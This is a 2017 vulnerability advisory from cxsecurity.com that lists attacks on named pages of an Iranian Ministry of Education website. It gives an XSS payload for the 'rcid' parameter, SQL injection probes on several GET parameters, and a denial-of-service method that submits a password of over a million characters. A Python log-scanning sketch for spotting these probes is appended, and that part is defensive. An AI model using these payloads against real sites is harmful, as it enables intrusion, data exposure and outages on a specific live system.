Iran's Sensing Center, Ministry of Education XSS / SQLi / DoS /CSRF

2017.06.20
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Vulnerability Title: Iran's Sensing Center, Ministry of Education High level vulns
# Date: 2017-06-20
# Exploit Author: Infinity Security Team
# Google Dork: [-]
# Vendor Homepage: http://www.medu.ir
# Tested on: Windows 7 (applicable to all Windows platforms)
# I show you how deep the rabbit-hole goes. "Morpheus"
--------------------------
1. Cross Site Scripting (XSS):
[+] http://aee.medu.ir/IranEduThms/theme2/cntntpge.php
 - "rcid" (GET input) parameter must be set to:
 - 67" onmouseover=prompt(916009) bad="
 - or
 - 67" onmouseover=prompt(948428) bad="

2. Long Password Denial of Service:
=> The attacker may cause the website to become temporarily/indefinitely unavailable or unresponsive.
[+] http://aee.medu.ir/IranEdu/edu_usrlgnchck.php
 - Vulnerable password input: "pass11"
 - test +1000000 characters.

3. SQL injection:
[+] http://aee.medu.ir/IranEdu/edu_getofferview.php
 > "cfnam" parameter was set to "\"
   "cmail" parameter was set to "\"
   "ctext" parameter was set to "\"
[+] http://aee.medu.ir/IranEdu/edu_newstoprnt.php
 > "rcid" parameter was set to "1'""
[+] http://aee.medu.ir/IranEdu/edu_sndtofrnd.php
 > "rcid" parameter was set to "1'""
[+] http://aee.medu.ir/IranEduThms/theme2/cntntpge.php
 > "rcid" parameter was set to "1'""
 - all GET input
--------------------------
# Discovered By: Root_Killer (https://t.me/root_killer)
# https://t.me/InfinitySec
# Root_Killer, Ehsan Korn
# @InfinitySec, @root_killer, @pohzeyshen
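A log-triage sketch for defenders, added here and not part of the original advisory: it flags access-log lines that carry the probe shapes listed above (quote or backslash in the named GET parameters, an injected event attribute, an oversized login request) against the named endpoints. The log layout with the request length as the last field, the 8192-byte ceiling, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Endpoints and GET parameters named in the advisory above.
WATCHED = {
    "/IranEduThms/theme2/cntntpge.php": {"rcid"},
    "/IranEdu/edu_getofferview.php": {"cfnam", "cmail", "ctext"},
    "/IranEdu/edu_newstoprnt.php": {"rcid"},
    "/IranEdu/edu_sndtofrnd.php": {"rcid"},
}
LOGIN_PATH = "/IranEdu/edu_usrlgnchck.php"
MAX_LOGIN_BYTES = 8192  # assumed ceiling for a sane login request

# Assumed layout: client "METHOD URL PROTO" status request_length
LINE_RE = re.compile(r'^\S+ "(\S+) (\S+) \S+" \d{3} (\d+)$')
EVENT_ATTR_RE = re.compile(r"\bon[a-z]+\s*=", re.I)

def classify(line):
    """Return sorted findings for one access-log line ([] if clean)."""
    m = LINE_RE.match(line.strip())
    if not m:
        return ["unparsed"]
    method, url, req_len = m.groups()
    parts = urlsplit(url)
    found = set()
    if (method, parts.path) == ("POST", LOGIN_PATH) and int(req_len) > MAX_LOGIN_BYTES:
        found.add("oversized-login-request")
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name not in WATCHED.get(parts.path, ()):
            continue
        if EVENT_ATTR_RE.search(value):      # injected HTML event attribute
            found.add("event-attribute:" + name)
        if any(c in value for c in "'\"\\"):  # quote or backslash breaking out
            found.add("quote-or-backslash:" + name)
    return sorted(found)

def scan(lines):
    results = ((i, classify(line)) for i, line in enumerate(lines))
    return {i: found for i, found in results if found}

# Constructed sample lines (TEST-NET client address), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 "GET /IranEduThms/theme2/cntntpge.php?rcid=67 HTTP/1.1" 200 412',
    '203.0.113.7 "GET /IranEdu/edu_newstoprnt.php?rcid=1%27%22 HTTP/1.1" 500 420',
    '203.0.113.7 "GET /IranEdu/edu_getofferview.php?cfnam=%5C&cmail=a%40b.example HTTP/1.1" 200 450',
    '203.0.113.7 "POST /IranEdu/edu_usrlgnchck.php HTTP/1.1" 200 1000412',
]
```

Quotes can be legitimate in fields that accept free text, so findings on those parameters are triage signals for review rather than block rules.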



Copyright 2017, cxsecurity.com

 
